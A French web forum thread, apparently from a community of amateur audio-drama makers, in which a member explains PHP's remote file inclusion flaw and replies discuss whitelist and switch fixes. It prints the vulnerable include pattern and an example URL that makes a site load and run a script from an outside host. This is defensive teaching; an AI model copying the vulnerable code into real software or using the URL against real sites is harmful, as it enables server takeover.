La Faille Include

Apprendre à maîtriser les outils informatiques pour bien diffuser ses sagas mp3.
Répondre ↩
WeeklyMP3
Le Nid de Johnny
Débris de l'Espace The Red Universe Enchaînés La Quête de Norulmyr
La Nuit Sans Image
Le Mag P3
Message
Auteur
D@rk Hell
Créateur
Créateur
Masculin Messages : 17
Enregistré le : dim. 28 janv. 2007, 19:28
Localisation : Un coin pomé
Contact :
Contacter D@rk Hell

La Faille Include

#1 Message par D@rk Hell » dim. 11 févr. 2007, 00:07

C'est dernier temp j'ai vu des site en php (de saga mp3 ou pas) qui uttilisait la fonction "include" tant connu...

Mais pour bon nombre de webmaster, cette fonction est aussi associer a la faille "include".
C'est pour sa que j'ai créer ce topic, pour prévenir les débutant en php de ne pas tomber dans le piege qui pourait ravir les Hackers.

Exemple de faille include dans une page PHP:

Code : Tout sélectionner

$page = $_GET['page'];
include($page.".php");


Dans ce cas, le nom du fichier est récupérer puis le fichiet php est inclus et le script est exécuter par le serveur....

L'URL du site serait alors quelque chose comme:
    http://lesite.com/index.php?page=test
Le fichier test.php est donc inclus...

Mais imaginez qu'un internaute malveillant arrive sur votre site, et découvre que votre site comporte cette faille.... Il n'aurait plus qu'a ecrire ceci

    http://lesite.com/index.php?page=http://sonsite.com/hacking
Dans ce cas le script sur sont serveur est exécuter sur le votre....Il peut donc exécuter ce qu'il veut sur votre serveur.

voici un exemple de sécuriter que vous pouvez utiiser pour eviter cela:

Code : Tout sélectionner

$page = $_GET['page'];// On récupére le nom de la page

$securiter = array("test","test2"); //on fait un tableau des pages autoriser

for($i=0; ;$i++){  //On créer une boucle de vérification
if( $page == $securiter[$i])break;
if(empty($securiter[$i])) exit("Hacking stoppé"); }

include($page.".php"); //on inclus la page


Avec ça, on est certain que aucune autres pages viendrons perturber le bon fonctionnement de votre site internet
Fondateur de DukeTotchi....
Haut
Avatar du membre
Canard Bigleux
Créateur
Créateur
Masculin Messages : 66
Enregistré le : mer. 17 janv. 2007, 19:04
Contact :
Contacter Canard Bigleux

#2 Message par Canard Bigleux » lun. 12 févr. 2007, 17:47

Merci de veiller à la sécurité de nos site webs ^^
Une ligue pas comme les autres sur http://lcj.ifrance.com
Haut
D@rk Hell
Créateur
Créateur
Masculin Messages : 17
Enregistré le : dim. 28 janv. 2007, 19:28
Localisation : Un coin pomé
Contact :
Contacter D@rk Hell

#3 Message par D@rk Hell » mar. 27 févr. 2007, 22:49

de rien...
Fondateur de DukeTotchi....
Haut
Nishiki
Neto-Chroniqueur
Neto-Chroniqueur
Masculin Messages : 344
Enregistré le : lun. 15 janv. 2007, 09:40
Localisation : Zone 11
Contact :
Contacter Nishiki

#4 Message par Nishiki » sam. 17 mars 2007, 18:46

Voir les messages bonnet d ane de cet utilisateur (1)

Donc si j'ai bien compris tu entre tout les pages autorisé dans la bdd, et après tu vérifie la page demandé
Haut
Avatar du membre
Cekos
Postulant
Postulant
Masculin Messages : 10
Enregistré le : lun. 02 avr. 2007, 21:23
Localisation : Euhh ... chez moi ?

#5 Message par Cekos » mar. 03 avr. 2007, 18:53

Je suis pas d'accord avec toi, a mon avis un bon vieux switch est plus efficace dans ce genre

Code : Tout sélectionner

$page = $_GET['page']

switch $page
 case "index":
  include('index.php');
  break;

 case "forum":
   include('forum.php');
   break;

Ect ...



Donc si j'ai bien compris tu entre tout les pages autorisé dans la bdd, et après tu vérifie la page demandé

Non pas dans la bdd, mais dans un array
Modifié en dernier par Cekos le lun. 09 avr. 2007, 20:17, modifié 1 fois.
PHP : Programmation Hyper Puissante !! (Si Si !)
Haut
Nishiki
Neto-Chroniqueur
Neto-Chroniqueur
Masculin Messages : 344
Enregistré le : lun. 15 janv. 2007, 09:40
Localisation : Zone 11
Contact :
Contacter Nishiki

#6 Message par Nishiki » mar. 03 avr. 2007, 19:03

Voir les messages bonnet d ane de cet utilisateur (1)

Et ben moi je met tout dans la BDD ^^
Haut
mike
Créateur
Créateur
Masculin Messages : 65
Enregistré le : lun. 21 mai 2007, 15:51
A travaillé sur : Le Collègebeuk

mono-mp3-Soldat Ryan
Localisation : Liège - Belgique

#7 Message par mike » dim. 10 juin 2007, 11:23

Si leur script s'appelle forum.php vous êtes mort quoi ^^
Moi j'utilise la méthode barbare du site du zero

<php>
Haut
Nishiki
Neto-Chroniqueur
Neto-Chroniqueur
Masculin Messages : 344
Enregistré le : lun. 15 janv. 2007, 09:40
Localisation : Zone 11
Contact :
Contacter Nishiki

#8 Message par Nishiki » dim. 10 juin 2007, 11:33

Voir les messages bonnet d ane de cet utilisateur (1)

Mort non car comment veux-tu qu'il est mit dans ton ftp le meme fichier que toi ?

Si il doivent appeler un fichier extérieur au site c'est sous la forme http://lalal.com/forum.php
Donc aucun risque
Haut
karottes
Postulant
Postulant
Masculin Messages : 41
Enregistré le : sam. 26 juil. 2008, 14:30
Localisation : Euuuuh ... là-bas ! Oui oui, tout au fond, deuxième à gauche ...!
Contact :
Contacter karottes

#9 Message par karottes » jeu. 16 oct. 2008, 20:36

J'hésite entre dire que ça reviens à être atteint de paranoïa aiguë et dire que c'est primordial ...
Sachant que la plupart des gens qui vont sur les sites de sagas mp3 sont :
- soit des buses en informatique
- soit des lammouzes
- soit des programmeurs "propres"
- soit des bonnes gens tout à fait sympathiques

je ne voit pas trop l'intérêt de cette sécurité (malgré tout, plus un site est sécurisé, mieux c'est ...)

Sinon, je te/vous remercie pour cette bienveillance :)
Image
Haut
refiloux
Créateur
Créateur
Masculin Messages : 219
Enregistré le : lun. 02 mars 2009, 19:03
A travaillé sur : Live Origin's :: La légendes des éléments :: Gerbe Of War-Arrêté :: Sonzuko mp3 Story (Acteur) - de Revan :: Banane , Ninjas et Katanas.(Acteur) - De Verdey :: Chaostica(Acteur) - De Art-Of-Kawaii :: Les Avant-Tu-Riais de la SOCQATOA (Figurant) - De Dychollin :: Am Stram Gram (Créateur avec SilverSon) :: Stupidy World (Acteur, de Tesk1chien) :: 2012-2036 (Acteur, de Khos) ::
Localisation : Saint-Malo Hiicého !
Contact :
Contacter refiloux

#10 Message par refiloux » lun. 02 mars 2009, 19:24

Bonnet d ane attribue par Blast le lun. 02 mars 2009, 19:35

Voir les messages bonnet d ane de cet utilisateur (11)

Hmm La faille incluse :smt007

C'est vrais que c'est pas térrible quand on ne veut pas se faire hacké .
Après ceux qui veulent ce faire hacké ( Mazo ) Vous pouvez éssayé ceci, Faut mettre surtout vos compte banquaire pour plus de sensation !


Allez bonne journée !

XD LOL PTDR MDR ... :smt012

[Edit Blast : ça faisait longtemps qu'on avait pas eu un petit boulet.]

Image

Haut
Avatar du membre
Kak Miortvi Pengvin
Netophoniste
Netophoniste
Masculin Messages : 4793
Enregistré le : dim. 21 janv. 2007, 10:31
Contact :
Contacter Kak Miortvi Pengvin

#11 Message par Kak Miortvi Pengvin » lun. 02 mars 2009, 19:34

Tu m'expliques l'intérêt de ce message? Ce que viennent faire là ces espèces de pseudos-smileys sms? Si c'est de l'humour, ce n'est ni fin ni drôle. Zéro intérêt, zéro contenu, orthographe minimale et sms... La prochaine fois, abstiens toi.

Edition: Raaah... Grillé par Blast pour le bonnet. Tant pis, je lui ai fauché le message de modération. :D
Modifié en dernier par Kak Miortvi Pengvin le lun. 02 mars 2009, 19:38, modifié 1 fois.
→ Carton poussiéreux.

:}
Haut
Avatar du membre
Verdey
Créateur
Créateur
Masculin Messages : 451
Enregistré le : dim. 24 août 2008, 23:52
A travaillé sur : Rien de correct

#12 Message par Verdey » lun. 02 mars 2009, 19:35

Alors rien que pour rigoler , j'ai essayé , et oui , c'est dangereux. Disons que j'ai réussi a supprimer la page via un script un peu trop bricolé.
Cependant , je rejoins l'avis de Cekos , un bon vieux switch est efficace.

Pour plus de renseignements : HackBBS = Exploit des Failles en PHP sur un site Web
(Je ne suis aucunement responsable de ce que vous trouverez sur ce site)
Haut
Avatar du membre
Alinor
Créateur
Créateur
Masculin Messages : 547
Enregistré le : mer. 07 mai 2008, 20:17
A travaillé sur : Les Chroniques de Ravnica, Arena, Assassin, Derniers jours de Szadec, Pong de Ark
Prochainement dans :
L.C.D.N : L'Aube du Chaos de Dychollin,Hard Life de Sim, Résistance de Szadec et Abolition de Destra.
Localisation : Devant les portes d'Ihzazsh
Contact :
Contacter Alinor

#13 Message par Alinor » lun. 02 mars 2009, 20:25

Bravo Dark, c'est simple et très compréhensible ;)

(pense tout de même à la relecture...)

Image
Image
Image

Haut
Avatar du membre
Kak Miortvi Pengvin
Netophoniste
Netophoniste
Masculin Messages : 4793
Enregistré le : dim. 21 janv. 2007, 10:31
Contact :
Contacter Kak Miortvi Pengvin

#14 Message par Kak Miortvi Pengvin » lun. 02 mars 2009, 20:32

Alinor, tu parles à un membre qui a posté il y a deux ans...
→ Carton poussiéreux.

:}
Haut
refiloux
Créateur
Créateur
Masculin Messages : 219
Enregistré le : lun. 02 mars 2009, 19:03
A travaillé sur : Live Origin's :: La légendes des éléments :: Gerbe Of War-Arrêté :: Sonzuko mp3 Story (Acteur) - de Revan :: Banane , Ninjas et Katanas.(Acteur) - De Verdey :: Chaostica(Acteur) - De Art-Of-Kawaii :: Les Avant-Tu-Riais de la SOCQATOA (Figurant) - De Dychollin :: Am Stram Gram (Créateur avec SilverSon) :: Stupidy World (Acteur, de Tesk1chien) :: 2012-2036 (Acteur, de Khos) ::
Localisation : Saint-Malo Hiicého !
Contact :
Contacter refiloux

#15 Message par refiloux » lun. 02 mars 2009, 21:00

Voir les messages bonnet d ane de cet utilisateur (11)

Ah d'accord c'est pour ça le bonnet ! Message d'humour ...

Image

Haut
Répondre ↩

Retourner vers « Tutoriels »

Qui est en ligne

Utilisateurs parcourant ce forum : Aucun utilisateur enregistré et 1 invité